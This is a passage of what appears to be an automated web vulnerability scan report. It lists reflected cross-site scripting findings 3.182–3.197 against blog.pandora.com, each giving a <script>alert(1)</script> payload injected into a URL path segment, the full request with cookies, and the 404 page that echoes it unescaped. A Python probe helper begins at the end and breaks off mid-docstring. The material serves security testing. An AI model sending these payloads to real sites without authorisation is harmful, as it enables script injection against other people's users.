Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ was not found on this server.</p>
...[SNIP]...

3.182. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7be86<script>alert(1)</script>858dc5f1838 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives7be86<script>alert(1)</script>858dc5f1838/2008/12/ was not found on this server.</p>
...[SNIP]...

3.183. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9cdec<script>alert(1)</script>3afc3bd0abd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20089cdec<script>alert(1)</script>3afc3bd0abd/12/ was not found on this server.</p>
...[SNIP]...

3.184. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6330d<script>alert(1)</script>5cbccb3c131 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/126330d<script>alert(1)</script>5cbccb3c131/ was not found on this server.</p>
...[SNIP]...

3.185. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9e242<script>alert(1)</script>c3f15fa67f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9e242<script>alert(1)</script>c3f15fa67f4/archives/2009/01/ was not found on this server.</p>
...[SNIP]...

3.186. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 89b64<script>alert(1)</script>b2d3b4a18a8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives89b64<script>alert(1)</script>b2d3b4a18a8/2009/01/ was not found on this server.</p>
...[SNIP]...

3.187. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7feb3<script>alert(1)</script>350dc8da11b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097feb3<script>alert(1)</script>350dc8da11b/01/ was not found on this server.</p>
...[SNIP]...

3.188. http://blog.pandora.com/pandora/archives/2009/01/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4d46<script>alert(1)</script>419734980f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/01b4d46<script>alert(1)</script>419734980f5/ was not found on this server.</p>
...[SNIP]...

3.189. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4d541<script>alert(1)</script>2442df8266b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4d541<script>alert(1)</script>2442df8266b/archives/2009/02/ was not found on this server.</p>
...[SNIP]...

3.190. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a4a2<script>alert(1)</script>ff59d7e80db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4a4a2<script>alert(1)</script>ff59d7e80db/2009/02/ was not found on this server.</p>
...[SNIP]...

3.191. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 714ce<script>alert(1)</script>bf225eb4a1f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009714ce<script>alert(1)</script>bf225eb4a1f/02/ was not found on this server.</p>
...[SNIP]...

3.192. http://blog.pandora.com/pandora/archives/2009/02/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 92265<script>alert(1)</script>2c48c4d86bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0292265<script>alert(1)</script>2c48c4d86bc/ was not found on this server.</p>
...[SNIP]...

3.193. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa04<script>alert(1)</script>a909529678b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraefa04<script>alert(1)</script>a909529678b/archives/2009/03/ was not found on this server.</p>
...[SNIP]...

3.194. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bc94c<script>alert(1)</script>9dc1dabafdc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p>
...[SNIP]...

3.195. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p>
...[SNIP]...

3.196. http://blog.pandora.com/pandora/archives/2009/03/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p>
...[SNIP]...

3.197. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p>
...[SNIP]...
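
Every blog.pandora.com finding from 3.179 through 3.197 has the same shape: a marker-wrapped probe appended to one path segment comes back, unescaped, inside the <p> text of the 404 page, so both the check and the fix are mechanical. The Python below is an added example and is not the scanner's code or anything taken from blog.pandora.com. It reproduces the per-segment injection the report numbers as "REST URL parameter N", models the vulnerable error page and its escaped counterpart as plain functions (constructed stand-ins, since the page only shows response bodies, not server code), and classifies a response as reflected unmodified or reflected escaped. The handler functions, the sample path and the payload shape are assumptions for illustration.

```python
import html
import secrets
from urllib.parse import quote

# Probe of the same shape as the report's payloads: random hex on either side of
# the script tag so the reflection can be located unambiguously in the response.
PROBE = "<script>alert(1)</script>"


def make_payload(probe: str = PROBE) -> str:
    """Return e.g. '6e4b2<script>alert(1)</script>1ff330e9b26' with fresh hex."""
    return secrets.token_hex(3)[:5] + probe + secrets.token_hex(6)[:11]


def inject_segment(path: str, index: int, payload: str) -> str:
    """Append payload to the 1-based path segment `index`.

    Mirrors the report's 'REST URL parameter N' numbering: for
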